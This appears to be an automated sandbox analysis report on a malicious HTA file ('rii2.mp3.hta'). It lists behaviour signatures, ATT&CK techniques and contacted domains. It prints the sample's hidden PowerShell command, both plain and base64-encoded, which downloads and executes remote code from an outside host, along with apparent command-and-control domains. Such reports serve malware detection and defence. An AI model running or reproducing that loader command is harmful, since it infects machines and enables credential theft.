              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2802Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 870Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3659Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6054Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAPI coverage: 9.6 %
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6596Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3872Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 592Thread sleep time: -16602069666338586s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7164Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_068A2920 GetSystemInfo,4_2_068A2920
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 00000002.00000002.2143279294.000000000711A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: powershell.exe, 00000004.00000002.2983061283.0000000006DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1$[
              Source: mshta.exe, 00000000.00000003.2150774745.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}&YP
              Source: mshta.exe, 00000000.00000003.2160936090.000000000301E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}YQ
              Source: powershell.exe, 00000002.00000002.2143279294.000000000711A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: powershell.exe, 0000000A.00000002.2976664907.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000002.00000002.2143732677.000000000718B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _NECVMWar&Prod_VMware_SATA_Cz
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043FF90 LdrInitializeThunk,10_2_0043FF90
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Yara matchFile source: amsi32_6536.amsi.csv, type: OTHER
              Source: Yara matchFile source: amsi32_3548.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6536, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3548, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: Base64 decoded Start-Process "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ArgumentList "-w hidden -ep bypass -nop -Command `"iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))`"" -WindowStyle Hidden
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: Base64 decoded Start-Process "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ArgumentList "-w hidden -ep bypass -nop -Command `"iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))`"" -WindowStyle HiddenJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: powershell.exeString found in binary or memory: truculengisau.biz
              Source: powershell.exeString found in binary or memory: spookycappy.biz
              Source: powershell.exeString found in binary or memory: punishzement.biz
              Source: powershell.exeString found in binary or memory: nuttyshopr.biz
              Source: powershell.exeString found in binary or memory: marketlumpe.biz
              Source: powershell.exeString found in binary or memory: littlenotii.biz
              Source: powershell.exeString found in binary or memory: grandiouseziu.biz
              Source: powershell.exeString found in binary or memory: fraggielek.biz
              Source: powershell.exeString found in binary or memory: degreehourz.click
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -enc uwb0ageacgb0ac0auabyag8aywblahmacwagaciaqwa6afwavwbpag4azabvahcacwbcafmaeqbzafcabwb3adyanabcafcaaqbuagqabwb3ahmauabvahcazqbyafmaaablagwababcahyamqauadaaxabwag8adwblahiacwboaguababsac4azqb4aguaigagac0aqqbyagcadqbtaguabgb0aewaaqbzahqaiaaiac0adwagaggaaqbkagqazqbuacaalqblahaaiabiahkacabhahmacwagac0abgbvahaaiaataemabwbtag0ayqbuagqaiabgaciaaqblahgaiaaoacgatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdagwaaqblag4adaapac4arabvahcabgbsag8ayqbkafmadabyagkabgbnacgajwboahqadabwahmaogavac8aaaayac4azqbyahiayqbuahqacgblagyacgbhagkabgb1ag4azabvagmaawblagqalgbzaggabwbwac8acgbpagkamgauagyaaqbsaguajwapackayaaiaciaiaatafcaaqbuagqabwb3afmadab5agwazqagaegaaqbkagqazqbuaa==
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -enc uwb0ageacgb0ac0auabyag8aywblahmacwagaciaqwa6afwavwbpag4azabvahcacwbcafmaeqbzafcabwb3adyanabcafcaaqbuagqabwb3ahmauabvahcazqbyafmaaablagwababcahyamqauadaaxabwag8adwblahiacwboaguababsac4azqb4aguaigagac0aqqbyagcadqbtaguabgb0aewaaqbzahqaiaaiac0adwagaggaaqbkagqazqbuacaalqblahaaiabiahkacabhahmacwagac0abgbvahaaiaataemabwbtag0ayqbuagqaiabgaciaaqblahgaiaaoacgatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdagwaaqblag4adaapac4arabvahcabgbsag8ayqbkafmadabyagkabgbnacgajwboahqadabwahmaogavac8aaaayac4azqbyahiayqbuahqacgblagyacgbhagkabgb1ag4azabvagmaawblagqalgbzaggabwbwac8acgbpagkamgauagyaaqbsaguajwapackayaaiaciaiaatafcaaqbuagqabwb3afmadab5agwazqagaegaaqbkagqazqbuaa==Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              111
              Process Injection
              1
              Masquerading
              OS Credential Dumping11
              Security Software Discovery
              Remote Services1
              Screen Capture
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              31
              Virtualization/Sandbox Evasion
              LSASS Memory1
              Process Discovery
              Remote Desktop Protocol1
              Email Collection
              1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts4
              PowerShell
              Logon Script (Windows)Logon Script (Windows)111
              Process Injection
              Security Account Manager31
              Virtualization/Sandbox Evasion
              SMB/Windows Admin Shares1
              Archive Collected Data
              3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook21
              Deobfuscate/Decode Files or Information
              NTDS1
              Application Window Discovery
              Distributed Component Object Model2
              Clipboard Data
              114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
              Obfuscated Files or Information
              LSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Software Packing
              Cached Domain Credentials33
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589497 Sample: rii2.mp3.hta Startdate: 12/01/2025 Architecture: WINDOWS Score: 100 28 truculengisau.biz 2->28 30 spookycappy.biz 2->30 32 10 other IPs or domains 2->32 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 12 other signatures 2->50 9 mshta.exe 1 2->9         started        signatures3 process4 signatures5 52 Encrypted powershell cmdline option found 9->52 12 powershell.exe 12 9->12         started        process6 signatures7 54 Suspicious powershell command line found 12->54 56 Bypasses PowerShell execution policy 12->56 58 Found suspicious powershell code related to unpacking or dynamic code loading 12->58 15 powershell.exe 15 16 12->15         started        19 conhost.exe 12->19         started        process8 dnsIp9 40 h2.errantrefrainundocked.shop 104.26.11.53, 443, 49712 CLOUDFLARENETUS United States 15->40 42 Injects a PE file into a foreign processes 15->42 21 powershell.exe 15->21         started        24 conhost.exe 15->24         started        26 dllhost.exe 15->26         started        signatures10 process11 dnsIp12 34 misha-lomonosov.com 104.21.14.233, 443, 49994 CLOUDFLARENETUS United States 21->34 36 degreehourz.click 188.114.97.3, 443, 49992 CLOUDFLARENETUS European Union 21->36 38 steamcommunity.com 104.102.49.254, 443, 49993 AKAMAI-ASUS United States 21->38

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              rii2.mp3.hta2%VirustotalBrowse
              rii2.mp3.hta0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://misha-lomonosov.com/apiM0%Avira URL Cloudsafe
              degreehourz.click0%Avira URL Cloudsafe
              https://misha-lomonosov.com/apijO0%Avira URL Cloudsafe
              https://misha-lomonosov.com/0%Avira URL Cloudsafe
              https://h2.errantrefrainundocked.shop/rii2.file0%Avira URL Cloudsafe
              https://grandiouseziu.biz/api100%Avira URL Cloudmalware
              https://h2.errantrefrainundocked.shop0%Avira URL Cloudsafe
              https://truculengisau.biz/api)O100%Avira URL Cloudmalware
              https://misha-lomonosov.com/u0%Avira URL Cloudsafe
              https://truculengisau.biz/api100%Avira URL Cloudmalware
              https://misha-lomonosov.com/j0%Avira URL Cloudsafe
              https://punishzement.biz/apicO100%Avira URL Cloudmalware
              https://degreehourz.click/api0%Avira URL Cloudsafe
              https://misha-lomonosov.com/GO0%Avira URL Cloudsafe
              https://degreehourz.click/apin0%Avira URL Cloudsafe
              https://punishzement.biz/api100%Avira URL Cloudmalware
              https://misha-lomonosov.com/UO0%Avira URL Cloudsafe
              https://misha-lomonosov.com/api0%Avira URL Cloudsafe
              https://nuttyshopr.biz/j100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              degreehourz.click
              188.114.97.3
              truetrue
                unknown
                steamcommunity.com
                104.102.49.254
                truefalse
                  high
                  h2.errantrefrainundocked.shop
                  104.26.11.53
                  truetrue
                    unknown
                    misha-lomonosov.com
                    104.21.14.233
                    truetrue
                      unknown
                      littlenotii.biz
                      unknown
                      unknowntrue
                        unknown
                        fraggielek.biz
                        unknown
                        unknowntrue
                          unknown
                          nuttyshopr.biz
                          unknown
                          unknowntrue
                            unknown
                            grandiouseziu.biz
                            unknown
                            unknowntrue
                              unknown
                              marketlumpe.biz
                              unknown
                              unknowntrue
                                unknown
                                spookycappy.biz
                                unknown
                                unknowntrue
                                  unknown
                                  truculengisau.biz
                                  unknown
                                  unknowntrue
                                    unknown
                                    punishzement.biz
                                    unknown
                                    unknowntrue
                                      unknown
                                      NameMaliciousAntivirus DetectionReputation
                                      degreehourz.clicktrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://steamcommunity.com/profiles/76561199724331900false
                                        high
                                        nuttyshopr.bizfalse
                                          high
                                          marketlumpe.bizfalse
                                            high
                                            grandiouseziu.bizfalse
                                              high
                                              https://h2.errantrefrainundocked.shop/rii2.filetrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              littlenotii.bizfalse
                                                high
                                                spookycappy.bizfalse
                                                  high
                                                  https://degreehourz.click/apitrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  truculengisau.bizfalse
                                                    high
                                                    https://misha-lomonosov.com/apitrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    fraggielek.bizfalse
                                                      high
                                                      punishzement.bizfalse
                                                        high
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://steamcommunity.com/profiles/76561199724331900iXApowershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2138233618.0000000005A89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2943745652.00000000055DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://misha-lomonosov.com/powershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://misha-lomonosov.com/apiMpowershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2943745652.00000000046C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://misha-lomonosov.com/apijOpowershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://crl.microsoftpowershell.exe, 00000002.00000002.2129463166.0000000002D27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2943745652.00000000046C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://h2.errantrefrainundocked.shoppowershell.exe, 00000004.00000002.2943745652.00000000046C7000.00000004.00000800.00020000.00000000.sdmptrue
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://truculengisau.biz/api)Opowershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://contoso.com/Licensepowershell.exe, 00000004.00000002.2943745652.00000000055DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://contoso.com/Iconpowershell.exe, 00000004.00000002.2943745652.00000000055DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://grandiouseziu.biz/apipowershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://misha-lomonosov.com/upowershell.exe, 0000000A.00000002.2977139224.0000000002F65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://truculengisau.biz/apipowershell.exe, 0000000A.00000002.2977139224.0000000002F65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2943745652.00000000046C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://misha-lomonosov.com/jpowershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2132029100.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2943745652.0000000004571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://misha-lomonosov.com/GOpowershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://punishzement.biz/apicOpowershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          https://degreehourz.click/apinpowershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://contoso.com/powershell.exe, 00000004.00000002.2943745652.00000000055DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2138233618.0000000005A89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2943745652.00000000055DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://nuttyshopr.biz/jpowershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://punishzement.biz/apipowershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://steamcommunity.com/powershell.exe, 0000000A.00000002.2977139224.0000000002F65000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2132029100.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2943745652.0000000004571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
